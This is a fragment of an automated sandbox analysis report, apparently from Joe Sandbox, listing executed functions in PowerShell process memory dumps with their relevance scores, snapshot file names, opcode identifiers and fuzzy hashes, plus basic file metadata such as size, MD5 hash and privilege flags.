                                                                    Imagebase:0x7ff78cec0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Function 00007FF848FF2026 Relevance: .5, Instructions: 474COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2418541267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f7aa94bdaa38675def3528cf84b3d797a11f0b3234a68a5fc69ed9da8aaf99e
                                                                      • Instruction ID: 75a904f27dadabedc3c7c1387050bce393b29a2b924b1fb5f4d825e44de313b7
                                                                      • Opcode Fuzzy Hash: 4f7aa94bdaa38675def3528cf84b3d797a11f0b3234a68a5fc69ed9da8aaf99e
                                                                      • Instruction Fuzzy Hash: 97E13732E0EAC64FF35AA76818561B47BE1EF56290F0801BFD249C71D3DE28AC45835A
                                                                      Function 00007FF848FF4BE5 Relevance: .4, Instructions: 437COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2418541267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f7b37761d7f78e33277aff4d81f86eb30c59551525afe36e71df47ac7dbe310
                                                                      • Instruction ID: 94fa6b1a61aa62e765a71a4af9d47f9ddb3d8b70dcc57cd565e357c602576795
                                                                      • Opcode Fuzzy Hash: 5f7b37761d7f78e33277aff4d81f86eb30c59551525afe36e71df47ac7dbe310
                                                                      • Instruction Fuzzy Hash: 55D15431D0EA8A5FEB96EB2858555B9BBE0EF26390F0800FBD54CC70D3DB18A845C765
                                                                      Function 00007FF848FF21C4 Relevance: .1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2418541267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b87fbf465b54e4609b5b52fa26fe7c04f44b1d698c8a3ac91f115f9f905b4504
                                                                      • Instruction ID: c97405a104b97b9ac245f8e0219d64a90a5bb803ecc5362cb6bd3361d938a71a
                                                                      • Opcode Fuzzy Hash: b87fbf465b54e4609b5b52fa26fe7c04f44b1d698c8a3ac91f115f9f905b4504
                                                                      • Instruction Fuzzy Hash: 54212631E1EA4A4FF395A76C185517466D2EF452A0F5800BBD21DC71D3EF2DAC05421D
                                                                      Function 00007FF848F23BB5 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2417931396.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff848f20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                      • Instruction ID: d725330ba92709bd9ebeb30e62369127f6c3244bce203fd248fe808a27b82538
                                                                      • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                      • Instruction Fuzzy Hash: 7701677111CB0C4FD754EF0CE451AA5B7E0FB95364F10056EE58AC36A5D736E882CB46

                                                                      Executed Functions

                                                                      Function 00007FF848FE3135 Relevance: .4, Instructions: 433COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2221928644.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff848fe0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad6fd03bc8a6c4defab2cfc3517f0d1f7a110c1753101b3e8376fed3407ac89a
                                                                      • Instruction ID: f490aa9dfa0623fe674e6e012a01f1103f106a2543bb146333e6e5d2a0d6966b
                                                                      • Opcode Fuzzy Hash: ad6fd03bc8a6c4defab2cfc3517f0d1f7a110c1753101b3e8376fed3407ac89a
                                                                      • Instruction Fuzzy Hash: E5D10231D1EA8A5FEB95EB2C58199B9BBA1EF16394F0800FED04CC71D3DA1CA8058365
                                                                      Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2221562683.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff848f10000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                      • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                      • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

                                                                      Executed Functions

                                                                      Function 00007FF848FF5FB9 Relevance: 1.7, Strings: 1, Instructions: 494COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3501446665.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: ee04a0e3473e226d4f7ec44196afbf56a5eb77b00d9ab360134a77ec955fc228
                                                                      • Instruction ID: ed7ac43b2ac2dea03df9c4b81ddf020dafc5abfe3d3f36dd415fc0220e90ef2d
                                                                      • Opcode Fuzzy Hash: ee04a0e3473e226d4f7ec44196afbf56a5eb77b00d9ab360134a77ec955fc228
                                                                      • Instruction Fuzzy Hash: 24E14631D0EA8A4FEB95EB2858555B87BE1EF597A4F0801BBD10DC71E3DF1CA8048319
                                                                      Function 00007FF848FF63CB Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3501446665.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 561defd9fafee35555fbf13490bf873af224e280b0d61e55420756bc7d5a0412
                                                                      • Instruction ID: 178e622f0f3ff9fca3d256da07fe131ad00de3cabc4f4b672bd070b2bf83b06e
                                                                      • Opcode Fuzzy Hash: 561defd9fafee35555fbf13490bf873af224e280b0d61e55420756bc7d5a0412
                                                                      • Instruction Fuzzy Hash: 29517C6180E7C65FE363AB3858691647FE0EF17664F1900FBD188CB1E7DA5C185AC326
                                                                      Function 00007FF848FF8C0B Relevance: .4, Instructions: 386COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3501446665.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 600d2853e1636f17bfab863184e08fe1bf2de16f456db6ae1d089a69da15dbe7
                                                                      • Instruction ID: cc21e65b8fc655032df903341378420360e998f1a392429eca161261a69f3854
                                                                      • Opcode Fuzzy Hash: 600d2853e1636f17bfab863184e08fe1bf2de16f456db6ae1d089a69da15dbe7
                                                                      • Instruction Fuzzy Hash: 8BC14431E2EA8A5FEB99EB6858455B9BBE1FF15390F4800BBD10DC71D3DB18A8048355
                                                                      Function 00007FF848FF6157 Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3501446665.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_7ff848ff0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9cd6d5f00a22b55ad6965d75c6d89c7a89a824fbd75c47ba8b4f88c8749ca77e
                                                                      • Instruction ID: 99ff57b997e82000386a46ae549f38fdcb1e47599fa561c52d9fcc0b800847ff
                                                                      • Opcode Fuzzy Hash: 9cd6d5f00a22b55ad6965d75c6d89c7a89a824fbd75c47ba8b4f88c8749ca77e
                                                                      • Instruction Fuzzy Hash: 89411431D1EA8A4FFB95EB2C58155786AE1EF5A6A4F4801BAE10CD31E3DF1C9C448319
                                                                      Function 00007FF848F23535 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.3500589252.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_7ff848f20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                      • Instruction ID: 01c669f675b49aa41b8d3eaa738ac70cd7eb62adcddbca5afcf2dc6879940799
                                                                      • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                      • Instruction Fuzzy Hash: 4601677111CB0C4FD748EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E881CB46